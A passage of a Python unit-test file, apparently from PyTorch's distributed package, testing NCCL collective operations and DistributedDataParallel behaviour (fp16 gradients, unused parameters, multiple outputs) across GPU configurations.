self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
        # Each GPU i contributes virtual_world_size input tensors with values
        # self.rank * self.num_gpus + i + j for j in range(virtual_world_size).
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
        # Build allreduce collectives that operate on 2, 3, ..., self.num_gpus
        # GPUs respectively.
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
for i in range(2, self.num_gpus + 1):
for j in range(i):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
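# Model definitions used by the DistributedDataParallel tests below.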
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 50, bias=False)
self.fc3 = nn.Linear(50, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
x = self.fc3(x)
return F.softmax(x, dim=1)
class DoubleGpuNet(nn.Module):
def __init__(self, gpus):
super(DoubleGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[1])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.fc3(x)
return F.softmax(x, dim=1).to(dev0)
class QuadraGpuNet(nn.Module):
def __init__(self, gpus):
super(QuadraGpuNet, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False).to(gpus[0])
self.fc2 = nn.Linear(10, 50, bias=False).to(gpus[1])
self.fc3 = nn.Linear(50, 4, bias=False).to(gpus[2])
self.fc4 = nn.Linear(4, 4, bias=False).to(gpus[3])
self.relu = nn.ReLU()
self.no_grad_param = nn.Parameter(
torch.tensor([2, 2]).long(), requires_grad=False
).to(gpus[0])
def forward(self, x):
dev0 = self.fc1.weight.device
dev1 = self.fc2.weight.device
dev2 = self.fc3.weight.device
dev3 = self.fc4.weight.device
x = self.relu(self.fc1(x.to(dev0)))
x = self.relu(self.fc2(x.to(dev1)))
x = self.relu(self.fc3(x.to(dev2)))
x = self.fc4(x.to(dev3))
return F.softmax(x, dim=1).to(dev0)
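# Convolutional model whose layers can be placed on different devices, memory
# formats, and dtypes.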
class ConvNet(nn.Module):
def __init__(self, gpus, layouts, dtypes):
super(ConvNet, self).__init__()
self.dtypes = dtypes
if isinstance(gpus, list):
self.layer_gpus = gpus
else:
gpus = [gpus] * 4
self.conv0 = torch.nn.Conv2d(8, 16, (2, 2)).to(
device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
        # We could write
        # x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
        # and so on, but we deliberately avoid reading the weights' devices here:
        # part of this test's purpose is to verify that the weights end up where
        # expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
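# Small helper modules; ModuleForDdpCommHook composes Task for the DDP
# communication hook tests.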
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
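# End-to-end DistributedDataParallel tests over Gloo and NCCL process groups.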
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class DistributedDataParallelTest(MultiProcessTestCase):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
        # NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING, so tests that
        # use NCCL_BLOCKING_WAIT will still test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def tearDown(self):
        # The DistributedDataParallel tests don't seem to call the FileStore
        # destructor. TODO: investigate; these tests are known to have issues.
        # As a workaround, remove the file manually here.
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model.get_ddp_logging_data()
self.assertTrue(ddp_logging_data.is_multi_device_module)
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model.get_ddp_logging_data()
self.assertFalse(ddp_logging_data.is_multi_device_module)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
            # DDP training: each rank trains on its own slice of the global input
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _test_gloo_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_gloo()
def test_gloo_backend_cpu_module(self):
self._test_gloo_backend([torch.device("cpu")], None)
@requires_gloo()
def test_gloo_backend_cpu_module_grad_is_view(self):
self._test_gloo_backend([torch.device("cpu")], None, gradient_as_bucket_view=True)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_gloo_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, int_devices)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_gloo_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, devices)
@requires_gloo()
@skip_if_lt_x_gpu(4)
def test_gloo_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, None, multi_device=True)
@requires_gloo()
@skip_if_lt_x_gpu(8)
def test_gloo_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, None, multi_device=True)
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
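# Concretely: the local gradient of the single weight is 2 ** 15; an
# unnormalized allreduce over 2 ranks would produce 2 ** 16 = 65536, which
# exceeds the fp16 maximum of 65504 and turns into inf, whereas dividing by
# the world size first keeps the result at 2 ** 15.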
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
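# DDP traverses the forward output to find all tensors (unpacking nested
# lists, tuples, and dicts) and hands them to the reducer, which is exactly
# what the box/unbox combinations below exercise.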
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter and will throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
# First, test that finding unused params under these conditions triggers
# an error when `backward` is called (because fc3 is detected as unused
# and is therefore marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith("Expected to mark a variable ready only once.")
)
else:
self.fail("Expected exception")
# Then test that no error is raised when `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test find_unused_parameters defaults to False
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_find_unused_parameters_kwarg(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_find_unused_parameters_kwarg_grad_is_view(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_global_local_unused_params_grad(self, gradient_as_bucket_view=False):
"""
By simulating a multi-task training, this test is to make sure:
1) DDP does not touch the grad of globally unused parameters.
2) DDP does update the grad of locally unused parameters.
"""
class GlobalLocalUnusedParamModule(nn.Module):
def __init__(self):
super(GlobalLocalUnusedParamModule, self).__init__()
self.t0 = Task()
self.t1 = Task()
self.task_unused = Task()
def task_parameters(self):
return (self.t0.p, self.t1.p, self.task_unused.p)
def forward(self, x, rank):
return self.t0(x) if rank == 0 else self.t1(x)
def run_and_verify_grad(model):
# Run forward
output = model(8, self.rank)
# The grads of all parameters should be None at this point.
t0_p, t1_p, task_unused_p = model.module.task_parameters()
self.assertIsNone(t0_p.grad)
self.assertIsNone(t1_p.grad)
self.assertIsNone(task_unused_p.grad)
# Run backward
output.mean().backward()
# Now the locally unused parameters should have their grads updated on all
# ranks, while the globally unused parameter should still have a None grad.
self.assertIsNotNone(t0_p.grad)
self.assertIsNotNone(t1_p.grad)
self.assertIsNone(task_unused_p.grad)
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
GlobalLocalUnusedParamModule().cpu(),
process_group=process_group,
find_unused_parameters=True,
gradient_as_bucket_view=gradient_as_bucket_view,
)
run_and_verify_grad(cpu_model)
# Test on GPU
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
GlobalLocalUnusedParamModule().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=True,
gradient_as_bucket_view=gradient_as_bucket_view,
)
run_and_verify_grad(gpu_model)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_global_local_unused_params_grad(self):
self._test_global_local_unused_params_grad()
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_global_local_unused_params_grad_with_grad_is_view(self):
self._test_global_local_unused_params_grad(gradient_as_bucket_view=True)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_find_unused_parameters_when_unused_parameters_empty(self):
"""
An empty unused_parameters array does not imply find_unused_parameters =
False. This test makes sure that DDP still allreduces locally unused
parameters when the forward pass in some process uses all parameters.
The module below uses all parameters on rank 0 and has unused parameters
on the other ranks.
"""
class FindUnusedParamModule(nn.Module):
def __init__(self):
super(FindUnusedParamModule, self).__init__()
self.t0 = Task()
self.t1 = Task()
def task_parameters(self):
return (self.t0.p, self.t1.p)
def forward(self, x, rank):
return self.t1(self.t0(x)) if rank == 0 else self.t1(x)
def run_and_verify_grad(model):
# Run forward
output = model(8, self.rank)
# The grads of all parameters should be None at this point.
for t_p in model.module.task_parameters():
    self.assertIsNone(t_p.grad)
# Run backward
output.mean().backward()
# Now even the locally unused parameter should have its grad updated on all ranks.
for t_p in model.module.task_parameters():
    self.assertIsNotNone(t_p.grad)
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
FindUnusedParamModule().cpu(),
process_group=process_group,
find_unused_parameters=True,
)
run_and_verify_grad(cpu_model)
# Test on GPU
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
FindUnusedParamModule().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=True,
)
run_and_verify_grad(gpu_model)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has their gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have their gradient set.
check_no_grads()
def _test_accumulate_gradients_no_sync(
self, num_iters=2, ddp_comm_hook=None, gradient_as_bucket_view=False
):
"""
This is the recommended way to implement gradient accumulation.
If ``ddp_comm_hook`` is specified, it is also registered on the
``ddp_model``. The hook passed into this function should not change
the resulting gradients.
"""
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
